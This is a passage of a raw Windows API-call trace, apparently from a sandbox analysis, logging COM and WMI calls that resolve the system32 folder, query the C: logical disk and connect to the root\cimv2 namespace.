[0154.891] CloseHandle (hObject=0x428) returned 1 [0154.891] CoTaskMemAlloc (cb=0x20c) returned 0xbe2e58 [0154.891] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe2e58 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0154.892] CoTaskMemFree (pv=0xbe2e58) [0154.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6c0ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.892] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f460 | out: ppv=0x6c0f460*=0xb51e34) returned 0x0 [0154.892] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f458 | out: pAptType=0x6c0f458*=1) returned 0x0 [0154.892] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f45c | out: ppvObject=0x6c0f45c*=0x0) returned 0x80004002 [0154.892] IUnknown:Release (This=0xb51e34) returned 0x1 [0154.894] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0edc8 | out: ppv=0x6c0edc8*=0x6024a20) returned 0x0 [0154.894] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024a20, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0efe0 | out: ppvObject=0x6c0efe0*=0x0) returned 0x80004002 [0154.894] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024a20, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eff4 | out: ppvObject=0x6c0eff4*=0x6025d80) returned 0x0 [0154.894] WbemDefPath:IUnknown:Release (This=0x6024a20) returned 0x0 [0155.013] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025d80, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec14 | out: ppvObject=0x6c0ec14*=0x6025d80) returned 0x0 [0155.013] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025d80, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ebd0 | out: ppvObject=0x6c0ebd0*=0x0) returned 0x80004002 [0155.013] WbemDefPath:IUnknown:AddRef (This=0x6025d80) returned 0x3 [0155.013] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025d80, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e52c | out: ppvObject=0x6c0e52c*=0x0) returned 0x80004002 [0155.013] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025d80, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e4dc | out: ppvObject=0x6c0e4dc*=0x0) returned 0x80004002 [0155.013] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025d80, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e4e8 | out: ppvObject=0x6c0e4e8*=0x66ccd58) returned 0x0 [0155.013] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccd58, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e4f0 | out: pCid=0x6c0e4f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0155.013] WbemDefPath:IUnknown:Release (This=0x66ccd58) returned 0x3 [0155.013] CoGetContextToken (in: pToken=0x6c0e548 | out: pToken=0x6c0e548) returned 0x0 [0155.013] CoGetContextToken (in: pToken=0x6c0e950 | out: pToken=0x6c0e950) returned 0x0 [0155.013] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025d80, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e9e0 | out: ppvObject=0x6c0e9e0*=0x0) returned 0x80004002 [0155.013] WbemDefPath:IUnknown:Release (This=0x6025d80) returned 0x2 [0155.013] WbemDefPath:IUnknown:Release (This=0x6025d80) returned 0x1 [0155.013] CoGetContextToken (in: pToken=0x6c0f2d8 | out: pToken=0x6c0f2d8) returned 0x0 [0155.014] CoGetContextToken (in: pToken=0x6c0f238 | out: pToken=0x6c0f238) returned 0x0 [0155.014] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025d80, riid=0x6c0f308*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f304 | out: ppvObject=0x6c0f304*=0x6025d80) returned 0x0 [0155.014] WbemDefPath:IUnknown:AddRef (This=0x6025d80) returned 0x3 [0155.014] WbemDefPath:IUnknown:Release (This=0x6025d80) returned 0x2 [0155.014] WbemDefPath:IWbemPath:SetText (This=0x6025d80, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0155.022] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025d80, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0155.022] WbemDefPath:IWbemPath:GetText (in: This=0x6025d80, lFlags=2, puBuffLength=0x6c0f488*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f488*=0x20, pszText=0x0) returned 0x0 [0155.022] WbemDefPath:IWbemPath:GetText (in: This=0x6025d80, lFlags=2, puBuffLength=0x6c0f488*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f488*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0155.023] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025d80, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0155.023] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025d80, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0155.023] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025d80, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0155.023] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025d80, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0155.023] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025d80, puCount=0x6c0f40c | out: puCount=0x6c0f40c*=0x0) returned 0x0 [0155.023] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6c0f3f8 | out: puCount=0x6c0f3f8*=0x2) returned 0x0 [0155.023] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3f4*=0xf, pszText=0x0) returned 0x0 [0155.023] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0155.023] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3a8 | out: ppv=0x6c0f3a8*=0xb51e34) returned 0x0 [0155.023] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3a0 | out: pAptType=0x6c0f3a0*=1) returned 0x0 [0155.023] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3a4 | out: ppvObject=0x6c0f3a4*=0x0) returned 0x80004002 [0155.023] IUnknown:Release (This=0xb51e34) returned 0x1 [0155.024] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0ed10 | out: ppv=0x6c0ed10*=0x6024a40) returned 0x0 [0155.024] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024a40, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0ef28 | out: ppvObject=0x6c0ef28*=0x0) returned 0x80004002 [0155.024] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024a40, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef3c | out: ppvObject=0x6c0ef3c*=0x6025df0) returned 0x0 [0155.024] WbemDefPath:IUnknown:Release (This=0x6024a40) returned 0x0 [0155.024] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025df0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb5c | out: ppvObject=0x6c0eb5c*=0x6025df0) returned 0x0 [0155.024] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025df0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0eb18 | out: ppvObject=0x6c0eb18*=0x0) returned 0x80004002 [0155.024] WbemDefPath:IUnknown:AddRef (This=0x6025df0) returned 0x3 [0155.024] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025df0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e474 | out: ppvObject=0x6c0e474*=0x0) returned 0x80004002 [0155.024] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025df0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e424 | out: ppvObject=0x6c0e424*=0x0) returned 0x80004002 [0155.024] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025df0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e430 | out: ppvObject=0x6c0e430*=0x66ccdc8) returned 0x0 [0155.025] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccdc8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e438 | out: pCid=0x6c0e438*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0155.025] WbemDefPath:IUnknown:Release (This=0x66ccdc8) returned 0x3 [0155.025] CoGetContextToken (in: pToken=0x6c0e490 | out: pToken=0x6c0e490) returned 0x0 [0155.025] CoGetContextToken (in: pToken=0x6c0e898 | out: pToken=0x6c0e898) returned 0x0 [0155.025] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025df0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e928 | out: ppvObject=0x6c0e928*=0x0) returned 0x80004002 [0155.025] WbemDefPath:IUnknown:Release (This=0x6025df0) returned 0x2 [0155.025] WbemDefPath:IUnknown:Release (This=0x6025df0) returned 0x1 [0155.025] CoGetContextToken (in: pToken=0x6c0f220 | out: pToken=0x6c0f220) returned 0x0 [0155.025] CoGetContextToken (in: pToken=0x6c0f180 | out: pToken=0x6c0f180) returned 0x0 [0155.025] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025df0, riid=0x6c0f250*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f24c | out: ppvObject=0x6c0f24c*=0x6025df0) returned 0x0 [0155.025] WbemDefPath:IUnknown:AddRef (This=0x6025df0) returned 0x3 [0155.025] WbemDefPath:IUnknown:Release (This=0x6025df0) returned 0x2 [0155.025] WbemDefPath:IWbemPath:SetText (This=0x6025df0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0155.025] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025df0, puCount=0x6c0f3d0 | out: puCount=0x6c0f3d0*=0x2) returned 0x0 [0155.025] WbemDefPath:IWbemPath:GetText (in: This=0x6025df0, lFlags=4, puBuffLength=0x6c0f3cc*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3cc*=0xf, pszText=0x0) returned 0x0 [0155.025] WbemDefPath:IWbemPath:GetText (in: This=0x6025df0, lFlags=4, puBuffLength=0x6c0f3cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0155.025] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3d0 | out: ppv=0x6c0f3d0*=0xb51e34) returned 0x0 [0155.025] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3c8 | out: pAptType=0x6c0f3c8*=1) returned 0x0 [0155.025] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3cc | out: ppvObject=0x6c0f3cc*=0x0) returned 0x80004002 [0155.025] IUnknown:Release (This=0xb51e34) returned 0x1 [0155.026] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0eff0 | out: ppv=0x6c0eff0*=0x60273d8) returned 0x0 [0155.026] WbemLocator:IUnknown:QueryInterface (in: This=0x60273d8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0f208 | out: ppvObject=0x6c0f208*=0x0) returned 0x80004002 [0155.026] WbemLocator:IClassFactory:CreateInstance (in: This=0x60273d8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f21c | out: ppvObject=0x6c0f21c*=0x6024aa0) returned 0x0 [0155.026] WbemLocator:IUnknown:Release (This=0x60273d8) returned 0x0 [0155.026] WbemLocator:IUnknown:QueryInterface (in: This=0x6024aa0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ee3c | out: ppvObject=0x6c0ee3c*=0x6024aa0) returned 0x0 [0155.026] WbemLocator:IUnknown:QueryInterface (in: This=0x6024aa0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0edf8 | out: ppvObject=0x6c0edf8*=0x0) returned 0x80004002 [0155.026] WbemLocator:IUnknown:AddRef (This=0x6024aa0) returned 0x3 [0155.026] WbemLocator:IUnknown:QueryInterface (in: This=0x6024aa0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e754 | out: ppvObject=0x6c0e754*=0x0) returned 0x80004002 [0155.026] WbemLocator:IUnknown:QueryInterface (in: This=0x6024aa0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e704 | out: ppvObject=0x6c0e704*=0x0) returned 0x80004002 [0155.026] WbemLocator:IUnknown:QueryInterface (in: This=0x6024aa0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e710 | out: ppvObject=0x6c0e710*=0x0) returned 0x80004002 [0155.026] CoGetContextToken (in: pToken=0x6c0e770 | out: pToken=0x6c0e770) returned 0x0 [0155.026] CoGetContextToken (in: pToken=0x6c0eb78 | out: pToken=0x6c0eb78) returned 0x0 [0155.027] WbemLocator:IUnknown:QueryInterface (in: This=0x6024aa0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec08 | out: ppvObject=0x6c0ec08*=0x0) returned 0x80004002 [0155.027] WbemLocator:IUnknown:Release (This=0x6024aa0) returned 0x2 [0155.027] WbemLocator:IUnknown:Release (This=0x6024aa0) returned 0x1 [0155.027] CoGetContextToken (in: pToken=0x6c0f1e8 | out: pToken=0x6c0f1e8) returned 0x0 [0155.027] CoGetContextToken (in: pToken=0x6c0f148 | out: pToken=0x6c0f148) returned 0x0 [0155.027] WbemLocator:IUnknown:QueryInterface (in: This=0x6024aa0, riid=0x6c0f218*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6c0f214 | out: ppvObject=0x6c0f214*=0x6024aa0) returned 0x0 [0155.027] WbemLocator:IUnknown:AddRef (This=0x6024aa0) returned 0x3 [0155.027] WbemLocator:IUnknown:Release (This=0x6024aa0) returned 0x2 [0155.027] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025df0, puCount=0x6c0f3ac | out: puCount=0x6c0f3ac*=0x2) returned 0x0 [0155.027] WbemDefPath:IWbemPath:GetText (in: This=0x6025df0, lFlags=8, puBuffLength=0x6c0f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3a8*=0xf, pszText=0x0) returned 0x0 [0155.027] WbemDefPath:IWbemPath:GetText (in: This=0x6025df0, lFlags=8, puBuffLength=0x6c0f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0155.027] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6c0f284 | out: ppv=0x6c0f284*=0x6024b00) returned 0x0 [0155.027] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6024b00, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6c0f318 | out: ppNamespace=0x6c0f318*=0x602476c) returned 0x0 [0156.284] WbemLocator:IUnknown:QueryInterface (in: This=0x602476c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1b4 | out: ppvObject=0x6c0f1b4*=0xb5a9b4) returned 0x0 [0156.284] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5a9b4, pProxy=0x602476c, pAuthnSvc=0x6c0f204, pAuthzSvc=0x6c0f200, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc, pImpLevel=0x6c0f1ec, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4 | out: pAuthnSvc=0x6c0f204*=0xa, pAuthzSvc=0x6c0f200*=0x0, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc*=0x6, pImpLevel=0x6c0f1ec*=0x2, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4*=0x1) returned 0x0 [0156.284] WbemLocator:IUnknown:Release (This=0xb5a9b4) returned 0x1 [0156.284] WbemLocator:IUnknown:QueryInterface (in: This=0x602476c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a8 | out: ppvObject=0x6c0f1a8*=0xb5a9d4) returned 0x0 [0156.284] WbemLocator:IUnknown:QueryInterface (in: This=0x602476c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a4 | out: ppvObject=0x6c0f1a4*=0xb5a9b4) returned 0x0 [0156.284] WbemLocator:IClientSecurity:SetBlanket (This=0xb5a9b4, pProxy=0x602476c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0156.285] WbemLocator:IUnknown:Release (This=0xb5a9b4) returned 0x2 [0156.285] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x1 [0156.285] CoTaskMemFree (pv=0xbd4a38) [0156.285] WbemLocator:IUnknown:Release (This=0x6024b00) returned 0x0 [0156.285] WbemLocator:IUnknown:QueryInterface (in: This=0x602476c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eda4 | out: ppvObject=0x6c0eda4*=0xb5a9d4) returned 0x0 [0156.285] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ed60 | out: ppvObject=0x6c0ed60*=0x0) returned 0x80004002 [0156.285] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0eb7c | out: ppvObject=0x6c0eb7c*=0x0) returned 0x80004002 [0156.285] WbemLocator:IUnknown:AddRef (This=0xb5a9d4) returned 0x3 [0156.285] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e6bc | out: ppvObject=0x6c0e6bc*=0x0) returned 0x80004002 [0156.286] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e66c | out: ppvObject=0x6c0e66c*=0x0) returned 0x80004002 [0156.286] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e678 | out: ppvObject=0x6c0e678*=0xb5a934) returned 0x0 [0156.286] WbemLocator:IMarshal:GetUnmarshalClass (in: 